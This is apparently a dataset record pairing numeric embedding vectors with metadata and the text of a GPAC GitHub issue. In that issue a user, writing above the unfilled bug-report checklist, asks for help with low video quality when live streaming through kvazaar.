-0.0041052051819860935, -0.003244262421503663, -0.014436518773436546, 0.012524111196398735, 0.006265650503337383, -0.016161998733878136, -0.015270501375198364, -0.03183511272072792, 0.006747347302734852, -0.0007122099632397294, -0.0007054698071442544, 0.0048852660693228245, 0.023524047806859016, 0.00820322148501873, -0.004637228325009346, -0.00048169659567065537, 0.007901262491941452, 0.0053022573702037334, 0.008361389860510826, 0.01619075797498226, -0.0011539149563759565, 0.007369238883256912, -0.011007126420736313, -0.008605833165347576, -0.007951588369905949, 0.02110837586224079, 0.007078064139932394, -0.022114906460046768, -0.0034150131978094578, 0.00584146985784173, 0.01139535941183567, 0.020202498883008957, 0.019080936908721924, -0.026975009590387344, -0.01831885054707527, -0.008713675662875175, -0.003821220016106963, -0.015845661982893944, -0.01170450821518898, -0.002474985783919692, 0.0005230362294241786, 0.005539510864764452, -0.011575097218155861, -0.004612065386027098, -0.008641780354082584, 0.004615659825503826, 0.007221854291856289, -0.007178717292845249, 0.0011467254953458905, -0.006833621300756931, 0.006747347302734852, -0.01915283128619194, -0.015543702058494091, -0.0009418246918357909, -0.000017468240912421606, 0.004586901981383562, 0.016478337347507477, 0.02864297293126583, -0.03612005338072777, 0.0015124913770705462, -0.0034761240240186453, 0.0236678384244442, -0.0013318551937118173, 0.013429989106953144, -0.007584923878312111, -0.02407045103609562, -0.009432625956833363, -0.008231978863477707, 0.019009042531251907, 0.01217182632535696, -0.0079803466796875, 0.007397997193038464, -0.0010586540447548032, 0.026903115212917328, -0.00683721574023366, -0.02304954081773758, -0.006873163394629955, 0.021467851474881172, -0.0024102802854031324, -0.011043074540793896, 0.009425436146557331, -0.01048229355365038, -0.00025320524582639337, -0.008900602348148823, -0.010424776934087276, 0.011697318404912949, 0.009296025149524212, -0.0074195656925439835, 0.0161763783544302, -0.0025055413134396076, -0.000778712856117636, 0.012135878205299377, -0.012617575004696846, 0.008145704865455627, -0.01619075797498226, 0.004479059483855963, -0.005999639164656401, 0.002607991686090827, 0.003821220016106963, -0.004971540067344904, 0.0099071329459548, -0.020590731874108315, 0.02238810807466507, 0.01738421432673931, 0.002300640568137169, -0.015399912372231483, -0.00047091234591789544, 0.004576117731630802, -0.016823433339595795, -0.015860039740800858, -0.001827930798754096, 0.0013183748815208673, 0.006391466595232487, -0.012416268698871136, 0.0029081532265990973, -0.0026798867620527744, 0.03264033794403076, -0.0191096942871809, 0.016995981335639954, 0.002918937476351857, -0.005618595518171787, 0.005805522203445435, -0.006416629999876022, -0.029505714774131775, -0.009943080134689808, -0.003679227316752076, -0.019742371514439583, -0.014623446390032768, 0.0020741710904985666, 0.01751362532377243, -0.013846979476511478, 0.01135222241282463, 0.0013354498660191894, 0.009943080134689808, -0.005963691510260105, 0.009748963639140129, 0.018879631534218788, -0.020734522491693497, 0.02526390738785267, 0.0166652649641037, -0.009022824466228485, -0.007218259386718273, -0.016837812960147858, -0.0362638458609581, 0.01345874648541212, 0.004040499683469534, 0.007182311732321978, 0.0029656693805009127, 0.03370438143610954, 0.0008861060487106442, 0.006495714653283358, -0.014364623464643955, -0.018865251913666725, -0.006330356001853943, 0.003060930175706744, -0.0017892871983349323, 0.02496194839477539, 0.010884905233979225, 0.00497513497248292, -0.012962670996785164, -0.0000367057764378842, 0.005334610119462013, -0.02921813353896141, 0.009224130772054195, 0.003522855695337057, -0.014048285782337189, -0.0022359348367899656, -0.02611226961016655, 0.037040311843156815, 0.027018146589398384, 0.017125392332673073, 0.001085614669136703, -0.01219339482486248, -0.0031777597032487392, -0.041785381734371185, 0.006258461158722639, -0.01023785024881363, 0.013846979476511478, -0.002124497666954994, -0.004798992071300745, 0.0013111853040754795, 0.02864297293126583, 0.007056495640426874, -0.0005899884854443371, -0.010985557921230793, 0.022934509441256523, -0.007441134192049503, -0.002733808010816574, 0.029735777527093887, -0.011165295727550983, 0.007354860194027424, 0.002895571757107973, -0.01728356070816517, 0.010863336734473705, -0.016550231724977493, 0.016291409730911255, 0.03143250197172165, 0.008720865473151207, -0.018376365303993225, 0.010618893429636955, 0.0015771968755871058, 0.009612363763153553, 0.010848958045244217, 0.012790123000741005, 0.0009849617490544915, -0.022761961445212364, 0.007807798683643341, 0.01782996393740177, 0.008210410363972187, 0.018606429919600487, -0.0017407580744475126, 0.0024228619877249002, 0.009605173952877522, -0.0017497448716312647, 0.03885206580162048, 0.019742371514439583, -0.01759989932179451, -0.00972739513963461, -0.0028452451806515455, 0.017801204696297646, -0.0023833196610212326, 0.03151877596974373, -0.010345692746341228, 0.010036543942987919, -0.007721524685621262, -0.00018288294086232781, -0.010669220238924026, 0.010489482432603836, -0.014695340767502785, 0.006323166657239199, -0.002890179632231593, -0.012933912687003613, 0.011402549222111702, -0.013753516599535942, 0.003235275624319911, -0.002947695553302765, -0.008296684361994267, -0.016751538962125778, -0.00678329449146986, -0.027018146589398384, -0.043021976947784424, 0.017571141943335533, -0.009130666963756084, 0.004583307076245546, -0.0006704209954477847, 0.029059965163469315, -0.024760643020272255, -0.0010218078969046474, 0.008131326176226139, -0.011575097218155861, 0.014752857387065887, -0.0011548136826604605, -0.005683301016688347, 0.003098675049841404, 0.022244317457079887, 0.010252228938043118, 0.0025396912824362516, 0.005640164017677307, -0.024530578404664993, 0.0017614278476685286, -0.009892754256725311, -0.004518601577728987, 0.01199208851903677, -0.0033125628251582384, -0.0045617385767400265, -0.002345574786886573, 0.009044392965734005, -0.01706787571310997, -0.000011128280675620772, -0.016967223957180977, -0.011762023903429508, -0.006930679548531771, 0.05262714996933937, 0.023524047806859016, 0.018520155921578407, -0.002457012189552188, -0.004971540067344904, -0.018592050299048424, -0.014170506969094276, -0.00775747187435627, 0.029146239161491394, -0.0071355802938342094, 0.0030501459259539843, -0.0000259496064245468, -0.005812712013721466, 0.002345574786886573, 0.007556166034191847, -0.007901262491941452, 0.013020186685025692, -0.0270900409668684, 0.004626444075256586, -0.006581988651305437, 0.011043074540793896, -0.0011638005962595344, -0.033273011445999146, 0.011690129525959492, -0.008361389860510826, 0.002025641966611147, -0.017412971705198288, -0.013660052791237831, -0.017139771953225136, 0.020820796489715576, 0.0037385406903922558, -0.0014765438390895724, 0.008426095359027386, -0.014292729087173939, -0.00019186982535757124, -0.005643758457154036, -0.007613682188093662, -0.016104483976960182, 0.018850872293114662, 0.004252590239048004, -0.006714994553476572, -0.0034743265714496374, 0.01158947590738535, 0.024487441405653954, 0.0016167390858754516, 0.006229702848941088, -0.014580308459699154, -0.004626444075256586, 0.0006996283773332834, -0.005025461316108704, -0.026859978213906288, 0.02021687850356102, 0.01621951535344124, -0.02185608446598053, -0.0004306960618123412, 0.022603793069720268, 0.020720142871141434, -0.015615597367286682, -0.019713612273335457, 0.005093761719763279, -0.012790123000741005, 0.008706485852599144, -0.023595944046974182, 0.004450301174074411, -0.0054244790226221085, 0.024861296638846397, 0.01356658898293972, -0.01170450821518898, 0.00397938909009099, -0.0004160923999734223, -0.014127369970083237, -0.005313041619956493, 0.03151877596974373, -0.011330653913319111, -0.0023599539417773485, 0.019612960517406464, 0.027363242581486702, 0.008994066156446934, 0.013243061490356922, -0.008914981968700886, -0.018563292920589447, -0.011891435831785202, 0.02292012982070446, 0.00684799998998642, -0.02057635225355625, 0.0022125691175460815, 0.005259120371192694, 0.002936911303550005, 0.014795994386076927, -0.0039146835915744305, -0.014616256579756737, 0.0026313576381653547, -0.0030447538010776043, 0.01135222241282463, -0.006477740593254566, 0.004989514127373695, 0.004101610742509365, -0.009813669137656689, -0.000618746445979923, 0.01203522551804781, 0.0242142416536808, -0.010554187931120396, -0.012905155308544636, 0.009439815767109394, 0.0056257848627865314, -0.01834760792553425, -0.016722779721021652, 0.016694022342562675, 0.007973156869411469, 0.01941165328025818, -0.010050922632217407, -0.006937868893146515, 0.0004504671960603446, 0.009569226764142513, -0.012179015204310417, -0.02283385582268238, 0.02000119350850582, 0.019497927278280258, 0.043654654175043106, -0.009461384266614914, -0.004331674426794052, -0.0019034205470234156, 0.01964171789586544, -0.012897965498268604, -0.007344075944274664, -0.00810975767672062, -0.025436455383896828, 0.020029950886964798, 0.01405547559261322, 0.00824635848402977, -0.00992870144546032, -0.008943739347159863, -0.0041052051819860935, 0.001969923498108983, -0.005679706111550331, -0.0036253060679882765, 0.012581627815961838, 0.003821220016106963, 0.012358753010630608, 0.002315019490197301, -0.012531301006674767, -0.018635187298059464, -0.029103102162480354, -0.010381639935076237, 0.0018144503701478243, 0.006779700051993132, -0.022589413449168205, 0.0010478697950020432, 0.010302555747330189, 0.01161104440689087, -0.014925405383110046, 0.0033395234495401382, 0.0026924682315438986, -0.014041095972061157, -0.00975615344941616, -0.0071643381379544735, -0.00820322148501873, -0.007300938945263624, -0.011064643040299416, 0.016564611345529556, 0.007858125492930412, 0.01915283128619194, 0.0049787298776209354, 0.0008025281131267548, 0.016909707337617874, 0.0006627821712754667, -0.007322507444769144, 0.010280987247824669, 0.0010487685212865472, -0.0028452451806515455, -0.004421543329954147, -0.013250251300632954, -0.0063842772506177425, -0.0016077522886916995, 0.010158765129745007, 0.0032173017971217632, 0.009504521265625954, -0.03174883872270584, -0.0041986689902842045, 0.0041986689902842045, -0.014925405383110046, 0.01013000775128603, -0.0010541606461629272, -0.009770532138645649, -0.01742735132575035, 0.017614278942346573, 0.002137079369276762, 0.005679706111550331, -0.009180993773043156, 0.005985260009765625, 0.008454853668808937, 0.018865251913666725, -0.024372410029172897, 0.017743689939379692, 0.034250784665346146, 0.0036217113956809044, -0.002773350104689598, 0.010633273050189018, -0.01636330597102642, -0.013861359097063541, -0.020547594875097275, 0.008943739347159863, 0.014062664471566677, 0.021884841844439507, 0.0027266184333711863, -0.012775744311511517, -0.03758671507239342, 0.004382001236081123, 0.029002448543906212, -0.02000119350850582, 0.015328017063438892, -0.003202922875061631, -0.008433285169303417, -0.028973691165447235, 0.014594688080251217, 0.028801143169403076, 0.027061283588409424, -0.002773350104689598, -0.01923910528421402, 0.01143849641084671, 0.012797312811017036, 0.010920852422714233, -0.0063950615003705025, -0.017010360956192017, 0.022733204066753387, -0.0019375706324353814, 0.014278349466621876, -0.005546700209379196, -0.004159126430749893, -0.02775147557258606, 0.015802524983882904, -0.007282964885234833, 0.01135222241282463, 0.004993108566850424, 0.007628060877323151, 0.01591755636036396, -0.012071172706782818, 0.0020346289966255426, -0.0015088965883478522, -0.011625424027442932, -0.026083510369062424, 0.003361091949045658, 0.013926064595580101, 0.010604514740407467, 0.00397938909009099, -0.014450897462666035, -0.0011853690957650542, -0.009030013345181942, -0.0028326634783297777, 0.017743689939379692, -0.0007396199507638812, 0.01604696735739708, -0.021424714475870132, -0.01893714629113674, -0.013358093798160553, 0.015989450737833977, 0.0009472168167121708, -0.014321486465632915, -0.014997299760580063, 0.014285539276897907, 0.016248272731900215, 0.02074890024960041, -0.01394044328480959, -0.0231789518147707, -0.012315616011619568, 0.01141692791134119, -0.015457428060472012, -0.021122755482792854, -0.00045788136776536703, 0.0004983223043382168, 0.01207836251705885, -0.02358156442642212, -0.009986217133700848, -0.001673356513492763, 0.02079203724861145, 0.010050922632217407, -0.03715534508228302, -0.0015915759140625596, 0.0035210582427680492, -0.016305789351463318, 0.0026906710118055344, 0.021971115842461586, 0.020375046879053116, 0.015270501375198364, 0.024041693657636642, 0.028441667556762695, -0.009633932262659073, -0.011251569725573063, 0.010424776934087276, -0.004813371226191521, 0.005108140874654055, 0.01680905371904373, 0.0022161637898534536, -0.016952844336628914, -0.005881011951714754, 0.008462043479084969, 0.0015897784614935517, 0.00831106398254633, 0.02434365265071392, 0.024890054017305374, -0.0040369052439928055, 0.005399315617978573, 0.0009337365045212209, 0.01632016897201538, 0.0028758004773408175, 0.0024084830656647682, 0.0065963673405349255, 0.018778977915644646, 0.010122817941009998, 0.0154718067497015, 0.015658734366297722, -0.002633154857903719, 0.01381103228777647, -0.013156787492334843, -0.0078725041821599, 0.011877056211233139, 0.007397997193038464, 0.0005248336237855256, -0.005981665104627609, -0.006779700051993132, 0.004957161378115416, 0.008411716669797897, -0.024976328015327454, 0.012545679695904255, 0.014220833778381348, 0.013271819800138474, 0.00024174698046408594, -0.016607748344540596, -0.027478273957967758, 0.0003228535351809114, 0.003675632644444704, 0.002789526479318738, -0.020820796489715576, 0.016075724735856056, 0.028441667556762695, 0.005618595518171787, -0.033531833440065384, -0.0037888672668486834, -0.004098015837371349, -0.00024039894924499094, -0.01143849641084671, -0.006711399648338556, 0.016061346977949142, -0.028700489550828934, 0.0037385406903922558, -0.019785508513450623, -0.012746986001729965, 0.008792759850621223, 0.02038942649960518, 0.001067640958353877, -0.013782273977994919, 0.0070421164855360985, 0.0034204053226858377, -0.01391887478530407, 0.01401233859360218, 0.010590136051177979, 0.018016889691352844, -0.010475103743374348, -0.013444367796182632, -0.015126710757613182, 0.006689831148833036, -0.012552869506180286, -0.018376365303993225, -0.011380980722606182, -0.007513029035180807, 0.013020186685025692, 0.005460426211357117, 0.0011602058075368404, 0.014522792771458626, 0.03738540783524513, -0.0010316934203729033, 0.014005148783326149, 0.008656159974634647, -0.004087231587618589, 0.02066262625157833, 0.00793720968067646, 0.0058989860117435455, 0.008807139471173286, -0.0048457239754498005, -0.0024210645351558924, 0.001837816322222352, 0.01821819692850113, -0.01734107732772827, -0.0004992210306227207, -0.018850872293114662, -0.007527408190071583, -0.022632550448179245, -0.004892455879598856, 0.017456108704209328, -0.007175122387707233, -0.027737095952033997, 0.0037637040950357914, -0.002458809409290552, -0.026054752990603447, -0.008454853668808937, -0.03140374273061752, 0.002640344435349107, -0.007157148793339729, -0.010568567551672459, -0.008979687467217445, -0.015169847756624222, 0.012624764814972878, -0.008059430867433548, -0.00802348367869854, -0.010805821046233177, 0.01853453554213047, 0.013638484291732311, 0.0034635423216968775, 0.02726258896291256, 0.00777904037386179, 0.011136537417769432, -0.009001255966722965, 0.011402549222111702, 0.01915283128619194, -0.014781614765524864, -0.012071172706782818, -0.01777244731783867, 0.013753516599535942, -0.0028524347580969334, 0.013286198489367962, 0.009612363763153553, 0.023912282660603523, -0.001372296130284667, -0.03036845475435257, -0.0033485102467238903, -0.010906473733484745, 0.0045509543269872665, 0.021611642092466354, 0.003684619441628456, 0.014414950273931026, 0.0011745848460122943, 0.019670475274324417, 0.0008303874055854976, -0.0042669689282774925, 0.006466956343501806, 0.0038823308423161507, -0.014695340767502785, 0.014767236076295376, 0.04282066971063614, -0.0067725102417171, 0.009288836270570755, -0.0036468745674937963, -0.0023365879897028208, 0.010431966744363308, 0.01190581452101469, 0.024487441405653954, -0.00009868713823379949, -0.007455512881278992, 0.0029494930058717728, -0.0034383791498839855, 0.015486186370253563, 0.0156874917447567, 0.008447663858532906, 0.03310046344995499, 0.002618775935843587, -0.010223470628261566, -0.0016230299370363355, 0.017887478694319725, 0.003210112452507019, 0.008397337980568409, 0.00030398109811358154, 0.000918908161111176, 0.00042732598376460373, -0.008318252861499786, 0.029333166778087616, -0.027205074205994606, -0.005704869516193867, -0.015773765742778778, 0.009921511635184288, 0.015069195069372654, -0.023524047806859016, 0.023452153429389, 0.00789407268166542, -0.0162338949739933, 0.012524111196398735, 0.011690129525959492, -0.0005684199859388173, -0.0030501459259539843, -0.0021963927429169416, -0.0034347842447459698, 0.0037565145175904036, -0.002004073467105627, 0.002634952310472727, 0.010431966744363308, 0.004464680328965187, 0.014652203768491745, -0.01768617331981659, 0.004443111829459667, 0.009109098464250565, 0.015543702058494091, -0.015500565059483051, 0.021913601085543633, -0.01387573778629303, 0.013070513494312763, -0.005499968770891428, -0.010050922632217407, -0.012689470313489437, -0.006671857554465532, -0.021525368094444275, -0.017269182950258255, -0.024746263399720192, 0.0067185889929533005, -0.003672037972137332, -0.0032856022007763386, -0.028297876939177513, 0.0002218635199824348, 0.0004142950347159058, -0.007484271191060543, 0.013638484291732311, -0.011050263419747353, -0.005514347460120916, 0.014486845582723618, 0.020691385492682457, -0.015572460368275642, 0.01369599997997284, 0.010733925737440586, 0.001863878220319748, 0.0161763783544302, -0.0009090225794352591, -0.016161998733878136, -0.0039542256854474545, 0.010230660438537598, 0.007469892036169767, -0.010316934436559677, -0.009856806136667728, 0.004971540067344904, -0.004615659825503826, -0.01777244731783867, 0.023567184805870056, -0.005075788125395775, 0.0203031525015831, -0.0140339070931077, -0.009008444845676422, 0.0037349460180848837, 0.00795877818018198, 0.00609669741243124, -0.015529323369264603, -0.00011306614032946527, 0.014220833778381348, 0.00032914435723796487, -0.00773590337485075, 0.011754835024476051, 0.004637228325009346, 0.013171166181564331, 0.012567248195409775, -0.009274456650018692, 0.03255406394600868, 0.007336886133998632, 0.002733808010816574, -0.011158105917274952, -0.00780060887336731, -0.013264629989862442, -0.009303214959800243, 0.01840512454509735, -0.004493438173085451, -0.01724042370915413, -0.012337184511125088, -0.0027194288559257984, 0.021712293848395348, -0.01203522551804781, -0.023063920438289642, 0.006998979486525059, 0.0014226225903257728, 0.011179674416780472, -0.00609669741243124, 0.009166614152491093, 0.008692107163369656, 0.008476422168314457, -0.022805098444223404, 0.02021687850356102, -0.009288836270570755, 0.014558739960193634, 0.006366303656250238, 0.007106821984052658, -0.01215025782585144, 0.013839790597558022, 0.00782217737287283, -0.005327420774847269, 0.00826792698353529, 0.005456831771880388, 0.005496373865753412, -0.010834578424692154, -0.009806480258703232, 0.012416268698871136, -0.0007796115824021399, 0.0008542026625946164, 0.013250251300632954, -0.009835237637162209, -0.009583605453372002, -0.0023833196610212326, 0.010618893429636955, 0.0006915401900187135, 0.0068120528012514114, -0.015773765742778778, -0.0025325019378215075, -0.027233831584453583, 0.010503862053155899, 0.007257801480591297, 0.05650947988033295, -0.006851594895124435, 0.0164495799690485, 0.0028254741337150335, -0.014982921071350574, -0.012200583703815937, -0.0009099212475121021, -0.02783774957060814, -0.018735840916633606, -0.001546641462482512, 0.005780359264463186, -0.0011907612206414342, -0.007236232981085777, -0.009993406943976879, 0.016679642722010612, -0.017844341695308685, 0.006218918599188328, 0.0031454069539904594, 0.005000298377126455, -0.01370318979024887, -0.01636330597102642, 0.01230123732239008, 0.025867825374007225, 0.02455933764576912, -0.00611826591193676, 0.0009858603589236736, 0.0014486844884231687, -0.01048229355365038, 0.011258759535849094, -0.024717506021261215, 0.02540769800543785, -0.004957161378115416, 0.002938708756119013, -0.02300640381872654, 0.023797249421477318, 0.024056071415543556, -0.018692703917622566, 0.005762385204434395, 0.00307530933059752, -0.007599303033202887, -0.00302138808183372, -0.02270444482564926, -0.03223772346973419, -0.015328017063438892, -0.012854828499257565, 0.0017740094335749745, -0.0018018687842413783, -0.024286136031150818, 0.0004601280961651355, 0.0024048881605267525, -0.010122817941009998, 0.02207176946103573, 0.02353842742741108, 0.021669156849384308, -0.009267267771065235, 0.020806416869163513, -0.017053497955203056, 0.013926064595580101, 0.005719248205423355, 0.01919596828520298, -0.00034307403257116675, -0.010431966744363308, -0.0027248209808021784, -0.0032586415763944387, 0.002025641966611147, 0.009296025149524212, -0.004410759080201387, -0.004205858334898949, 0.005395720712840557, 0.02890179492533207, 0.0008730750996619463, 0.0012815286172553897, -0.0030034142546355724, -0.0017892871983349323, -0.014982921071350574, -0.020159361883997917, 0.023265225812792778, 0.015543702058494091, 0.007390807382762432, 0.00005672965926351026, 0.019052179530262947, -0.010798631235957146, 0.0002574740210548043, -0.0049535664729774, -0.00785093568265438, -0.0008488105377182364, -0.0156874917447567, -0.007656819187104702, -0.00777904037386179, -0.00679407874122262, 0.013279009610414505, 0.030656034126877785, 0.013429989106953144, 0.0005468514282256365, -0.003972199745476246, 0.004241805989295244, -0.016147620975971222, 0.0037349460180848837, 0.005848659202456474, 0.0011467254953458905, 0.015155469067394733, 0.005176440812647343, 0.0018189438851550221, 0.009274456650018692, 0.024659989401698112, -0.0003594750596676022, 0.01680905371904373, -0.010568567551672459, 0.005093761719763279, 0.0019285837188363075, 0.014148938469588757, 0.016334546729922295, 0.0022017848677933216, 0.016291409730911255, 0.0028452451806515455, 0.010590136051177979, 0.002297045662999153, 0.015227364376187325, 0.023308362811803818, 0.025335803627967834, 0.0003543076163623482, 0.009260077960789204, 0.007584923878312111, 0.013954821974039078, -0.016507094725966454, -0.00767119787633419, -0.007563355378806591, 0.010784252546727657, 0.03192138671875, 0.020159361883997917, -0.002640344435349107, -0.005672516766935587, 0.011222811415791512, 0.006589177995920181, 0.01813192293047905, 0.01148163340985775, 0.01964171789586544, 0.03660894185304642, -0.01168293971568346, -0.01689532771706581, -0.022618170827627182, 0.04083636775612831, -0.0053202309645712376, -0.007405186537653208, -0.017369834706187248, 0.038679517805576324, -0.004727097228169441, 0.0002752231084741652, -0.035573653876781464, -0.023826008662581444, 0.004957161378115416, 0.004924808628857136, 0.020015571266412735, 0.021626019850373268, -0.015960693359375, 0.014220833778381348, -0.03560240939259529, -0.00041766511276364326, -0.005352583713829517, 0.012509732507169247, 0.018117543309926987, 0.010841768234968185, -0.011999278329312801, 0.011301896534860134, 0.012725417502224445, 0.001847701845690608, -0.0065460409969091415, -0.00306452508084476, 0.011625424027442932, 0.018692703917622566, -0.008080999366939068, -0.00782217737287283, -0.015112332068383694, 0.00818165298551321, 0.004881671629846096, 0.022057389840483665, 0.001837816322222352, -0.012840449810028076, 0.010467913933098316, 0.004601281136274338, 0.015026058070361614, -0.005305852275341749, -0.021510988473892212, 0.0232364684343338, 0.014364623464643955, 0.0011485228314995766, -0.00404409458860755, -0.016924086958169937, 0.0008263433119282126, 0.010777062736451626, 0.012977049686014652, 0.001073931809514761, 0.020360667258501053, -0.009626742452383041, -0.005187225062400103, 0.024890054017305374, 0.020605111494660378, 0.003679227316752076, 0.025378940626978874, 0.019210347905755043, -0.005996044259518385, -0.006664667744189501, 0.010453535243868828, 0.03456712141633034 ]
3,057
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hello, I am using gpac with kvazaar to live stream. Although it seems like a problem from kvazaar. However, I would like to seek for support from you. I hope that you guys can collaborate. https://github.com/ultravideo/kvazaar/issues/307#issue-970080319 Thank you very much.
Live streaming with kvazaar - Low quality
https://api.github.com/repos/gpac/gpac/issues/1875/comments
21
2021-08-13T06:19:22
2021-09-13T09:52:35Z
https://github.com/gpac/gpac/issues/1875
970,098,729
1,875
false
This is a GitHub Issue repo:gpac owner:gpac Title : Live streaming with kvazaar - Low quality Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Hello, I am using gpac with kvazaar to live stream. Although it seems like a problem from kvazaar. However, I would like to seek for support from you. I hope that you guys can collaborate. https://github.com/ultravideo/kvazaar/issues/307#issue-970080319 Thank you very much. --- end body ---
1,124
[ -0.004652700386941433, 0.018488561734557152, -0.01420257706195116, 0.005890364293009043, 0.024768561124801636, -0.005454889964312315, -0.015027686953544617, 0.04281400889158249, -0.023928172886371613, 0.02622014284133911, 0.0009425728931091726, -0.005076714791357517, 0.03071240521967411, 0.026006225496530533, -0.007601702120155096, 0.029260823503136635, 0.0008098295656964183, 0.021300045773386955, 0.0014945558505132794, 0.018335765227675438, 0.013415667228400707, -0.008946324698626995, -0.007120388559997082, 0.025670070201158524, 0.0212236475199461, 0.0043509239330887794, -0.01871776022017002, 0.014141458086669445, -0.03269878029823303, -0.025074157863855362, 0.019191432744264603, 0.015845157206058502, -0.007582602556794882, 0.012208563275635242, 0.04764242842793465, 0.008801166899502277, 0.0730985775589943, 0.055251769721508026, 0.01367542427033186, 0.008434451185166836, -0.021177807822823524, -0.039299655705690384, -0.02988729625940323, 0.02365313656628132, -0.004717639181762934, 0.00009060445881914347, 0.014126178808510303, 0.03453235700726509, -0.019710946828126907, -0.05684087052941322, 0.029398342594504356, -0.03349332883954048, -0.04629780352115631, -0.02090277150273323, -0.010932699777185917, -0.031812552362680435, 0.0496593602001667, -0.009557517245411873, 0.012475959956645966, 0.016670266166329384, 0.004820778034627438, 0.020337417721748352, -0.017281457781791687, 0.03523522615432739, -0.006852991878986359, -0.018137127161026, -0.015967395156621933, 0.042294494807720184, -0.03972749039530754, 0.03829118609428406, -0.008946324698626995, -0.03474627435207367, 0.028023159131407738, 0.041622184216976166, 0.03459347411990166, -0.02664797753095627, 0.03162919357419014, 0.04177498444914818, -0.017021700739860535, 0.04223337769508362, -0.05069838836789131, 0.009656836278736591, -0.03661040961742401, -0.006322018802165985, 0.034226760268211365, 0.006998150143772364, -0.06105809658765793, -0.0651530846953392, -0.020230460911989212, 0.022018197923898697, -0.029841456562280655, 0.03162919357419014, 0.011146617121994495, -0.04235561564564705, 0.013125351630151272, 0.0289705079048872, -0.06118033453822136, -0.013331628404557705, -0.05219580978155136, 0.0006933211116120219, -0.018060727044939995, -0.017143940553069115, 0.028664911165833473, -0.01286559458822012, 0.04452534765005112, -0.019008075818419456, 0.0058712647296488285, -0.03190423175692558, 0.023026663810014725, 0.10139677673578262, 0.021773720160126686, -0.0012615388259291649, 0.005302092060446739, -0.01650218851864338, -0.030758244916796684, 0.018335765227675438, 0.003837140742689371, -0.013178830966353416, -0.0026987954042851925, 0.005825425032526255, -0.01072642207145691, -0.047031234949827194, -0.0019672748167067766, 0.02319474145770073, -0.006100461818277836, 0.026602137833833694, -0.025654790922999382, 0.020047102123498917, 0.0021754619665443897, -0.005275352392345667, -0.01050486508756876, -0.014813769608736038, -0.007697200868278742, -0.020643014460802078, -0.004690899513661861, -0.012093964964151382, -0.005286811850965023, 0.02252243086695671, 0.017388416454195976, -0.0068682716228067875, 0.00479021854698658, -0.034012842923402786, 0.04770354554057121, 0.00807537604123354, 0.020520776510238647, -0.0005051884800195694, -0.011864767409861088, 0.0167313851416111, -0.013583745807409286, -0.011383453384041786, -0.00521805277094245, -0.05204300954937935, -0.01718977838754654, -0.001396192004904151, 0.05448777973651886, 0.028114838525652885, -0.010183989070355892, 0.0020207539200782776, 0.010856300592422485, -0.015470800921320915, -0.035143546760082245, -0.010252748616039753, 0.018656639382243156, -0.010955619625747204, 0.022766906768083572, -0.011291774921119213, 0.014026859775185585, 0.025822868570685387, -0.020123502239584923, 0.01683834381401539, 0.01685362309217453, 0.007659001741558313, 0.004106447100639343, 0.024860240519046783, -0.05323483422398567, -0.000034797365515260026, 0.03587697818875313, -0.002188831800594926, -0.048192501068115234, 0.0014095618389546871, -0.020291579887270927, 0.009947151876986027, 0.007502383552491665, 0.0017103829886764288, 0.04049148038029671, -0.028435714542865753, 0.053723789751529694, -0.02761060558259487, 0.015486081130802631, 0.01648690737783909, 0.030544327571988106, 0.04009420424699783, 0.014439414255321026, -0.03624369576573372, 0.012437759898602962, -0.005504549480974674, -0.015646519139409065, -0.04122491180896759, 0.014554012566804886, -0.010764622129499912, -0.016013234853744507, -0.009725594893097878, -0.011773088946938515, -0.05561848357319832, -0.02113196812570095, 0.005802505649626255, -0.0009454378741793334, 0.03599921613931656, -0.015111725777387619, -0.01567707769572735, -0.04779522493481636, -0.017984328791499138, 0.01836632378399372, -0.014554012566804886, -0.012178003787994385, 0.008579609915614128, -0.042783450335264206, -0.02424904890358448, -0.030758244916796684, -0.001765772351063788, 0.015226324088871479, -0.019802626222372055, 0.05057615041732788, 0.005844525061547756, -0.06221935898065567, -0.011062578298151493, 0.02643406018614769, -0.05919395759701729, 0.00929012056440115, 0.01859552040696144, 0.02423376776278019, 0.0035792940761893988, -0.009144962765276432, 0.007097468711435795, -0.002870693104341626, 0.020169340074062347, -0.016303550451993942, -0.006165400613099337, -0.024554643779993057, -0.0033959364518523216, -0.011169536039233208, 0.029612259939312935, -0.007219707127660513, 0.010313867591321468, 0.012850315310060978, 0.03725216165184975, 0.009481118060648441, -0.001961544854566455, -0.04189722239971161, -0.021437564864754677, -0.006409877445548773, -0.022201554849743843, 0.005833065137267113, -0.012995473109185696, -0.03358500823378563, 0.017831530421972275, 0.020352698862552643, -0.006421337369829416, -0.01859552040696144, -0.07315970212221146, 0.0027102550957351923, -0.006669634487479925, -0.02285858616232872, -0.017938489094376564, -0.019359510391950607, -0.02710637077689171, 0.00047558388905599713, -0.0060660820454359055, 0.010756981559097767, 0.005791045725345612, -0.006746033206582069, 0.0005405230331234634, -0.027855081483721733, -0.010596543550491333, 0.00041494215838611126, 0.011811288073658943, 0.010856300592422485, -0.022461311891674995, 0.038841262459754944, -0.004297444596886635, -0.016700824722647667, 0.002121982630342245, -0.013988660648465157, 0.030498487874865532, -0.025807587429881096, 0.007319026160985231, 0.03639649227261543, -0.04098043218255043, -0.06001906841993332, -0.0026625057216733694, -0.003861970268189907, 0.002593746641650796, -0.04513654112815857, 0.0045610214583575726, 0.00854905042797327, 0.015547200106084347, -0.027152210474014282, 0.020963890478014946, 0.02794676087796688, 0.022705787792801857, -0.00577194569632411, 0.014256056398153305, 0.019084474071860313, -0.02690773457288742, -0.03798559308052063, 